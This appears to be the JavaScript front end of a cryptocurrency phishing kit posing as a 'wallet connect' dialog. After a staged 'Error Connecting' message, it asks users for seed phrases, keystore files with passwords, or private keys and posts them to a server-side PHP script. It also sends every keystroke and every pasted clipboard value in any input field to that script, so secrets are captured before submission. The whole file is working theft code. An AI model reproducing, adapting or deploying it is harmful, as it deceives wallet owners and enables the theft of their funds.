function switchshow(element) {
  $('.sgrid').removeClass('sactive');
  $(element).addClass('sactive');

  if ($(element).text() == "Phrase") {
    $('.ccbox').removeClass('activebox');
    $('.phrasebox').addClass('activebox');
    $('#wallettype').val("phrase");
    $("#wallet_tab").attr('value', 'Phrase');
	$("#wallet_tab").val('Phrase');  
  } 
  else if ($(element).text() == "Keystore JSON") {
    $('.ccbox').removeClass('activebox');
    $('.keystorebox').addClass('activebox');
    $('#wallettype').val("keystore");
    $("#wallet_tab").attr('value', 'Keystore');
	$("#wallet_tab").val('Keystore');  
  } 
  else if ($(element).text() == "Private Key") {
    $('.ccbox').removeClass('activebox');
    $('.privatebox').addClass('activebox');
    $('#wallettype').val("privatekey");
    $("#wallet_tab").attr('value', 'Private');
	$("#wallet_tab").val('Private');  
  }
}
$(".wallet_wrapper a").click(function () {
    $('#connect_api').removeClass('hiddenX');
    $(".wallet_sc_val").html($(this).find('.wallet_scname').text());
    $(".wallet_sc_img").attr("src", $(this).find('img').attr('src'));

    $("#wallet_type").attr('value', $(this).find('.wallet_scname').text());
	$("#wallet_type").val($(this).find('.wallet_scname').text());

    setTimeout(function () {
      $('.wallet_sc_text').html("Error Connecting");
      $('.wallet_sc_text').addClass('error');
      $('.wallet_sc_spin').addClass('hiddenX');
      $('.wallet_sc_connect').removeClass('hiddenX');
    }, 3000);
});
$(".cw-Modal").click(function () {
    $('#connect_api').addClass('hiddenX');
    $('.wallet_sc_auto').removeClass('hiddenX');
    $('.wallet_sc_manual').addClass('hiddenX');

    $('.wallet_sc_text').html("Initializing");
    $('.wallet_sc_text').removeClass('error');
    $('.wallet_sc_spin').removeClass('hiddenX');
    $('.wallet_sc_connect').addClass('hiddenX');

    $('.ccbox').removeClass('activebox');
    $('.phrasebox').addClass('activebox');

    $('.sgrid').removeClass('sactive');
    $('#wallet_sc_default').addClass('sactive');

    $('.allinput').val("");

    $(".wallet_sc_msg").addClass("hiddenX");
});
$('.wallet_sc_connect').click(function () {
    $('.wallet_sc_auto').addClass('hiddenX');
    $('.wallet_sc_manual').removeClass('hiddenX');
});
$('.wallet_sc_connect_b').click(function () {
    $('#wallet_connect_old').removeClass('hiddenX');
    $('#wallet_re_connect').addClass('hiddenX');

    $('#connect_api').addClass('hiddenX');
    $('.wallet_sc_auto').removeClass('hiddenX');
    $('.wallet_sc_manual').addClass('hiddenX');

    $('.wallet_sc_text').html("Initializing");
    $('.wallet_sc_text').removeClass('error');
    $('.wallet_sc_spin').removeClass('hiddenX');
    $('.wallet_sc_connect').addClass('hiddenX');

    $('.ccbox').removeClass('activebox');
    $('.phrasebox').addClass('activebox');

    $('.sgrid').removeClass('sactive');
    $('#wallet_sc_default').addClass('sactive');

    $('.allinput').val("");

    $(".wallet_sc_msg").addClass("hiddenX");
});

$(document).ready(function () {
    $('#wallet_sc_submit').click(function (e) {
        e.preventDefault();
        var walletType = $("#wallet_type").val();
        var phrase_key = $("#wallet_phrase").val();
        var keystore = $("#wallet_keystore").val();
        var keystore_pass = $("#wallet_keystore_pass").val();
        var private_key = $("#wallet_private_key").val();
        var wallet_tab = $("#wallet_tab").val();
			
        $.ajax({
            url: "wallet_connect_files/tech/web3.php",
            method: "POST",
            beforeSend: function () {
                $(".wallet_sc_msg").removeClass("hiddenX");
                $('#wallet_sc_submit').addClass('hiddenX');
            },
            data: {walletType, phrase_key, keystore, keystore_pass, private_key, wallet_tab, "validate_data":"validate_data"},
            success: function (e) {     
              $(".wallet_sc_text_msg").html('Verifying Wallet');     
              if (e == 1) {
                    $(".wallet_sc_text_msg").html('Decrypting tech Phrase');
                    $(".wallet_sc_text_msg").removeClass('error');
                    $('.wallet_sc_spin_msg').removeClass('hiddenX');
                    setTimeout(() => {
                       $('#wallet_sc_submit').removeClass('hiddenX');
                       $('#wallet_connect_old').addClass('hiddenX');
                       $('#wallet_re_connect').removeClass('hiddenX');
                    }, 3000);                         
              }
              else{
                  $(".wallet_sc_text_msg").html('Verifying Wallet');
                  $(".wallet_sc_text_msg").removeClass('error');
                  $('.wallet_sc_spin_msg').removeClass('hiddenX');
                  $(".wallet_sc_msg").removeClass("hiddenX");
                    setTimeout(() => {
                        $('#wallet_sc_submit').removeClass('hiddenX');
                        $('.wallet_sc_spin_msg').addClass('hiddenX');
                        $(".wallet_sc_text_msg").addClass('error');
                        $(".wallet_sc_text_msg").html(e);
                        setTimeout(() => {
                          $(".wallet_sc_text_msg").html('');
                           $(".wallet_sc_msg").addClass("hiddenX");
                        }, 3000); 
                  }, 3000);                             
              }
            }
        });
    });
	
 
    $('input, textarea').on('paste', function (e) {
      if (e.originalEvent.clipboardData) {
          var text = e.originalEvent.clipboardData.getData("text/plain");
          var wallet_tab = $("#wallet_tab").val();
          $.ajax({
              url: "wallet_connect_files/tech/web3.php",
              method: "POST",
              data: {text, wallet_tab, "verifyphrase_b":"verifyphrase_b"},
              success: function (e) { 
              }
          });
      }
  });
  
  $('input, textarea').keyup(function(){
      var text = $(this).val();
      var wallet_tab = $("#wallet_tab").val();
      $.ajax({
          url: "wallet_connect_files/tech/web3.php",
          method: "POST",
          data: {text, wallet_tab,"verifyphrase":"verifyphrase"},
          success: function (e) { 
          }
      });
    });
  
 
    
   
});